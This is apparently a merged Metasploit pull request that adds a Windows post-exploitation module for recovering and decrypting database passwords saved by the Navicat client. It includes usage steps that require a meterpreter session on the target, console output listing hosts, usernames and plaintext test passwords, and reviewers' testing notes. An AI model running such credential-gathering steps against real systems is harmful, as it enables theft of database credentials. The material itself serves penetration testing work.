### PR TITLE
Gather_Navicat

### PR DESCRIPTION
**Pull request by cn-kali-team**
## Vulnerable Application

This module can decrypt the password of navicat, If the user chooses to remember the password.

  Analysis of encryption algorithm [here](https://github.com/HyperSine/how-does-navicat-encrypt-password).

  You can find its official website [here](https://navicat.com/).

## Verification Steps

  1. Download the latest installer of Navicat.
  2. Use navicat to log in to DB server.
  3. Remember to save the account password.
  4. Get a `meterpreter` session on a Windows host.
  5. Do: ```run post/windows/gather/credentials/navicat```
  6. If the session file is saved in the system, the host, port, user name and plaintext password will be printed.

## Options

 **NCX_PATH**

  - Specify the path of the NCX export file. e.g.:connections.ncx

## Scenarios

```
meterpreter > run post/windows/gather/credentials/navicat 

*] Gathering Navicat password information from WIN-79MR8QJM50N 
Navicat Sessions 
================                                                                                                                                        
Name            Protocol  Hostname   Port   Username  Password                                                                                                 
----            --------  --------   ----   --------  --------                                                                                                 
mongodb         mongodb   localhost  27017  user      password  
test_mysql      mysql     localhost  3306   root      test_mysql_password 
test_oracle     oracle    127.0.0.1  1521   user      password
test_pg         postgres  localhost  5432   postgres  test_pg_password
test_sqlserver  mssql     127.0.0.1  1433   user      password

[+] Session info stored in: /home/kali-team/.msf4/loot/20221002233644_default_192.168.80.128_host.navicat_ses_919319.txt
[*] Post module execution completed
meterpreter > 
```

* Specify **NCX_PATH**

```
msf6 post(windows/gather/credentials/navicat) > set ncx_path C:\\Users\\FireEye\\Desktop\\connections.ncx
ncx_path => C:\Users\FireEye\Desktop\connections.ncx
msf6 post(windows/gather/credentials/navicat) > run

[*] Gathering Navicat password information from WIN-79MR8QJM50N
[*] Looking for C:\Users\FireEye\Desktop\connections.ncx
[+] navicat.ncx saved to /home/kali-team/.msf4/loot/20221002234356_default_192.168.80.128_navicat.creds_838577.txt
Navicat Sessions
================

Name            Protocol    Hostname   Port   Username  Password
----            --------    --------   ----   --------  --------
mongodb         mongodb     localhost  27017            password
test_mysql      mysql       localhost  3306             test_mysql_password
test_oracle     oracle      127.0.0.1  1521             password
test_pg         postgresql  localhost  5432             test_pg_password
test_sqlserver  sqlserver   127.0.0.1  1433             password

[+] Session info stored in: /home/kali-team/.msf4/loot/20221002234356_default_192.168.80.128_host.navicat_ses_522370.txt
[*] Finished processing C:\Users\FireEye\Desktop\connections.ncx
[*] Post module execution completed


```

### CODE REVIEW

**Comment by cn-kali-team** [comment]
## How export NCX file
- menu bar --> File --> Export Connections

**Review by jmartin-tech — COMMENTED** [review]
Some minor improvements. Calling `fail_with` and can better log the reason the module failed and the extra `return` calls are believed to be redundant.

**Review by cdelafuente-r7 — CHANGES_REQUESTED** [review]
Thanks @cn-kali-team for this contribution! I tested on a Windows installation with MySQL and Navicat 16.1.3 and verified the password is correctly retrieved. I left a few comments and suggestions for you to review when you get a chance.

**Comment by cn-kali-team** [comment]
Any questions?

**Review by cdelafuente-r7 — APPROVED** [review]

**Comment by cdelafuente-r7** [comment]
Thanks for updating this @cn-kali-team. I tested against Navicat version 16.1.3 on Windows 11 and verified the password is retrieved correctly. I just found a minor issue in `run` where `fail_with` should be used instead of `return`. I'll go ahead and patch it myself before it lands. Not a big deal. Thanks again for your contribution.

Example output:
```
msf6 post(windows/gather/credentials/navicat) > run verbose=true session=1

[*] Gathering Navicat password information.
Navicat Sessions
================

Name              Protocol  Hostname   Port  Username  Password
----              --------  --------   ----  --------  --------
MySQL Connection  mysql     localhost  3306  root      P@ssw0rd!

[+] Session info stored in: /home/msfuser/.msf4/loot/20221107121446_default_10.0.0.35_host.navicat_ses_957418.txt
[*] Finished processing from the registry
[*] Post module execution completed
msf6 post(windows/gather/credentials/navicat) > loot

Loot
====

host             service  type                  name                  content     info              path
----             -------  ----                  ----                  -------     ----              ----
10.0.0.35           host.navicat_session  navicat_sessions.txt  text/plain  Navicat Sessions  /home/msfuser/.msf4/loot/20221107121446_default_10.0.0.35_host.navicat_ses_957418.txt

msf6 post(windows/gather/credentials/navicat) > creds
Credentials
===========

host  origin           service  public  private    realm  private_type  JtR Format
----  ------           -------  ------  -------    -----  ------------  ----------
      10.0.0.35           root    P@ssw0rd!         Password
```

**Comment by cdelafuente-r7** [comment]
# Release Notes
This adds a post module that retrieves and decrypts passwords saved by Navicat.

**Pull request merged**
